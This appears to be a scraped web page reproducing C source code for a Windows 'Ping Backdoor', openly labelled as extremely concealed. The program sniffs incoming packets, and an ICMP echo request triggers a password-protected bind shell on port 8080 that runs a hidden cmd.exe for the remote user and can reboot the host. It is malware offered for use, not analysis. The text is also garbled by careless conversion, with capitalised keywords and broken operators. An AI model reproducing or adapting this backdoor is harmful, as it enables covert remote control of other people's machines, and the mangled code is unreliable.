Extremely concealed source code of the ping Backdoor

Source: Internet
Author: User
Tags set socket htons

Extremely concealed Ping BackdoorSource code

# Include <stdio. h>

# Include <stdlib. h>

# Include <winsock2.h>

# Include <ws2tcpip. h>

# Include <mstcpip. h>

# Define ICMP_Echo 8 // The type of ICMP echo request message is 8

# Define ICMP_ECHOREPLY 0 // The type value of the ICMP echo response packet is 0

# Define sniffer_icmp_size 101 // large for listening to ICMP packets?

# Define bind_port 8080 // default bind shell Port

# Define max_packet 10000 // What is the maximum ICMP packet size?

# Define def_password "givemeshell! "// Default password

# Define xmalloc (s) heapalloc (getprocessheap (), heap_zero_memory, (s ))

// Define the IP Header

Typedef struct iphdr

{

Unsigned char h_verlen; // 4-bit header length, 4-bit IP address version 1

Unsigned char TOS; // 8-bit service type TOS 1

Unsigned short total_len; // The total length of 16 bits (in bytes) 2

Unsigned short ident; // 16-bit ID 2

Unsigned short frag_and_flags; // 3-digit flag 2

Unsigned char TTL; // 8-bit TTL 1

Unsigned char proto; // 8-bit protocol (TCP, UDP, or other) 1

Unsigned short checksum; // 16-bit IP header checksum 2

Unsigned int sourceip; // 32-bit source IP address 4

Unsigned int destip; // 32-bit destination IP address 4

} Ipheader; // IP header length: 20

// Define the ICMP Header

Typedef struct _ ihdr

{

Unsigned char I _type; // 8-bit type 1

Unsigned char I _code; // 8-bitCode1

Unsigned short I _cksum; // 16-bit checksum and 2

Unsigned short I _id; // identification number (identified by process number) 2

Unsigned short I _seq; // message serial number 2

} Icmpheader; // ICMP Header Length: 8

Int sniffer (); // listen to ICMP?

Void decode_sniffer (char *, Int, struct sockaddr_in *); // simple sniffer unpackProgram

Int bindshell (); // bind Shell

DWORD dwbufferlen [10];

DWORD dwbufferinlen = 1;

DWORD dwbytesreturned = 0;

Handle bindthread;

// Main icmpdoor Function

Int main (INT argc, char ** argv)

{

Wsadata;

Int retval;

// Socket Initialization

If (retval = wsastartup (makeword (2, 2), & wsadata ))! = 0)

{

Printf ("wsastartup failed: % d \ n", retval );

Exit (-1 );

}

// Start sniffer

Sniffer ();

// Socket ends

Wsacleanup ();

Return 0;

}

// Main function of sniffer

Int sniffer ()

{

Int packsize = sniffer_icmp_size;

Socket socksniffer;

Struct sockaddr_in DEST, from;

Struct hostent * HP;

Int sread;

Int fromlen = sizeof (from );

Unsigned char localname [256];

Char * recvbuf;

// Create an original socket to accept all received packets (sniffer)

If (socksniffer = wsasocket (af_inet, sock_raw, ipproto_ip, null, 0, wsa_flag_overlapped) = invalid_socket)

{

Printf ("wsasocket () failed: % d \ n", wsagetlasterror ());

Return-1;

}

// Obtain the local address

Gethostname (char *) localname, sizeof (localname)-1 );

If (HP = gethostbyname (char *) localname) = NULL)

{

Return-1;

}

Memset (& DEST, 0, sizeof (DEST ));

Memcpy (& DeST. sin_addr.s_addr, HP-> h_addr_list [0], HP-> h_length); // TCP sniffing options

DeST. sin_family = af_inet;

DeST. sin_port = htons (8000); // specify any port

// Socket bind

BIND (socksniffer, (psockaddr) & DEST, sizeof (DEST ));

// Set socket to accept all packets

Wsaioctl (socksniffer, sio_rcvall, & dwbufferinlen, sizeof (dwbufferinlen), & dwbufferlen,

Sizeof (dwbufferlen), & dwbytesreturned, null, null );

// Allocate the socket receiving buffer size to max_packet

Recvbuf = (char *) xmalloc (max_packet );

Printf ("sniffer OK! ");

// The size of the loop listener package

While (1)

{

// Read data

Sread = recvfrom (socksniffer, recvbuf, max_packet, 0, (struct sockaddr *) & from, & fromlen );

// If an error occurs while reading data

If (sread = socket_error | sread <0)

{

If (wsagetlasterror () = wsaetimedout)

{

Continue;

}

Printf ("recvfrom failed: % d \ n", wsagetlasterror ());

Return-1;

}

Else

// If (sread> = 28)

// If the size of the read data = the size of the listener package + 28

If (sread = packsize + 28)

{

// Send the received data to the sniffer unpacking program for processing.

Decode_sniffer (recvbuf, sread-28, & from );

}

}

Return 1;

}

// Simple sniffer unpacking program

Void decode_sniffer (char * Buf, int bytes, struct sockaddr_in * From)

{

Icmpheader * icmphdr;

// The ICMP header address equals the length of the BUF + IP header: BUF + 20

Icmphdr = (icmpheader *) (BUF + sizeof (ipheader ));

/*

Printf ("\ r \ n % d bytes from % s,", bytes, inet_ntoa (from-> sin_addr); // retrieve the received data

Printf ("icmp_type: % d", icmphdr-> I _type); // check type

Printf ("icmp_seq: % d \ r \ n", icmphdr-> I _seq); // retrieve the serial number

//? Outbound data segment BUF + 28 + I

For (INT I = 0; I <bytes-1; I ++)

{

Printf ("% C", * (BUF + sizeof (ipheader) + sizeof (icmpheader) + I ));

}

*/

// If (icmphdr-> I _type = ICMP_Echo | icmphdr-> I _type = ICMP_ECHOREPLY)

// Determine if the packet is an ICMP request packet

If (icmphdr-> I _type = ICMP_Echo)

{

// Bind Shell

Bindshell ();

// DWORD bid;

// Bindthread = createthread (null, 0, bindshell, 0, 0, & bid );

}

Else

Printf ("\ r \ n get other packets! ");

Return;

}

// Bind shell function

Int bindshell (){

Int bport = bind_port;

Socket bindserver, getclient;

Struct sockaddr_in addrserver, addrclient;

Char buff [4096];

Char * messages = "\ r \ n ====================== Ping backdoor v0.1 ==== ===============================\ r \ n ========== code by lion.

Welcome to <a href = 'HTTP: // www.cnhonker.net 'target = _ blank> http://www.cnhonker.net </a> ===========\ r \ n ";

Char * getpass = "\ r \ n your password :";

Char * passok = "\ r \ n OK! Please enter :";

Char * nothispass = "\ r \ n sorry, your password not right. \ r \ n ";

Char * exitok = "\ r \ n exit OK! \ R \ n ";

Char * rebootok = "\ r \ n reboot now! \ R \ n ";

// Create a socket

Bindserver = socket (af_inet, sock_stream, ipproto_tcp );

// Specify the server address and port

Addrserver. sin_family = af_inet;

Addrserver. sin_port = htons (bport );

Addrserver. sin_addr.s_addr = addr_any;

// Set timeout

Int timeout = 60000;

Setsockopt (bindserver, sol_socket, so_rcvtimeo, (char *) & timeout, sizeof (timeout ));

// Set the reuse Port

Uint breuser = 1;

Setsockopt (bindserver, sol_socket, so_reuseaddr, (char *) & breuser, sizeof (breuser ));

// Listening port

BIND (bindserver, (struct sockaddr *) & addrserver, sizeof (addrserver ));

Listen (bindserver, 2 );

Printf ("\ r \ n bind port on % d OK.", bport );

// Accept client connection

Int ilen = sizeof (addrclient );

// Receives one connection

Getclient = accept (bindserver, (struct sockaddr *) & addrclient, & ilen );

If (getclient! = Invalid_socket)

{

// If there is a connection, set the delay to 60 s.

Int itimeout = 60000;

Setsockopt (getclient, sol_socket, so_rcvtimeo, (char *) & itimeout, sizeof (itimeout ));

}

Else

Return-1;

// Write welcome information

Send (getclient, messages, strlen (messages), 0 );

// WRITE password verification information

Send (getclient, getpass, strlen (getpass), 0 );

// Receive data

Recv (getclient, buff, 0 );

// Verify the password

If (! (Strstr (buff, def_password )))

{

// If the password is incorrect, write the Password error message

Send (getclient, nothispass, strlen (nothispass), 0 );

Printf ("\ r \ n password not right! ");

Closesocket (getclient );

Closesocket (bindserver );

Return-1;

}

// Write verification information

Send (getclient, passok, strlen (passok), 0 );

// Create two anonymous Pipelines

Handle hreadpipe1, hwritepipe1, hreadpipe2, hwritepipe2;

Unsigned long lbytesread;

Security_attributes SA;

SA. nlength = 12;

SA. lpsecuritydescriptor = 0;

SA. binherithandle = true;

Createpipe (& hreadpipe1, & hwritepipe1, & SA, 0 );

Createpipe (& hreadpipe2, & hwritepipe2, & SA, 0 );

Startupinfo siinfo;

Char character line [] = "cmd.exe ";

Process_information processinformation;

Zeromemory (& siinfo, sizeof (siinfo ));

Siinfo. dwflags = startf_useshowwindow | startf_usestdhandles;

Siinfo. wshowwindow = sw_hide;

Siinfo. hstdinput = hreadpipe2; // read the data written by the socket to pipe2

Siinfo. hstdoutput = siinfo. hstderror = hwritepipe1; // write data here

Printf ("\ r \ n pipe create OK! ");

// Create a cmd process that reads data from hreadpipe2 and writes data to hwritepipe1

Int bread = CreateProcess (null, cmdline, null, & siinfo, & processinformation );

While (1)

{

// Check whether data is returned in the MPs queue

Int ret = peeknamedpipe (hreadpipe1, buff, 1024, & lbytesread );

If (lbytesread)

{

// Read data from the pipeline hreadpipe1

Ret = readfile (hreadpipe1, buff, lbytesread, & lbytesread, 0 );

If (! RET) break;

// Write the data read from the pipeline hreadpipe1 to the getclient

Ret = Send (getclient, buff, lbytesread, 0 );

If (Ret <= 0) break;

}

Else

{

// If the getclient connection receives data

Lbytesread = Recv (getclient, buff, 1024,0 );

If (lbytesread <= 0) break;

// Write the data read from the getclient connection to hwritepipe2

Ret = writefile (hwritepipe2, buff, lbytesread, & lbytesread, 0 );

If (lbytesread> 4 & buff [0] = 'E' & buff [1] = 'X' & buff [2] = 'I '&& buff [3] = 'T ')

{

// Write and exit Information

Send (getclient, exitok, strlen (exitok), 0 );

Closesocket (getclient );

Closesocket (bindserver );

Return 1;

}

Else if (lbytesread> 6 & buff [0] = 'R' & buff [1] = 'E' & buff [2] = 'B '& & buff [3] = 'O '&&

Buff [1] = 'O' & buff [2] = 'T ')

{

// Write restart

Send (getclient, rebootok, strlen (rebootok), 0 );

Closesocket (getclient );

Closesocket (bindserver );

Exitwindowsex (ewx_reboot, null );

Return 1;

}

If (! RET) break;

}

}

Closesocket (getclient );

Closesocket (bindserver );

Return 1;

}

Contact Us

The content source of this page is from Internet, which doesn't represent Alibaba Cloud's opinion; products and services mentioned on that page don't have any relationship with Alibaba Cloud. If the content of the page makes you feel confusing, please write us an email, we will handle the problem within 5 days after receiving your email.

If you find any instances of plagiarism from the community, please send an email to: info-contact@alibabacloud.com and provide relevant evidence. A staff member will contact you within 5 working days.

A Free Trial That Lets You Build Big!

Start building with 50+ products and up to 12 months usage for Elastic Compute Service

  • Sales Support

    1 on 1 presale consultation

  • After-Sales Support

    24/7 Technical Support 6 Free Tickets per Quarter Faster Response

  • Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.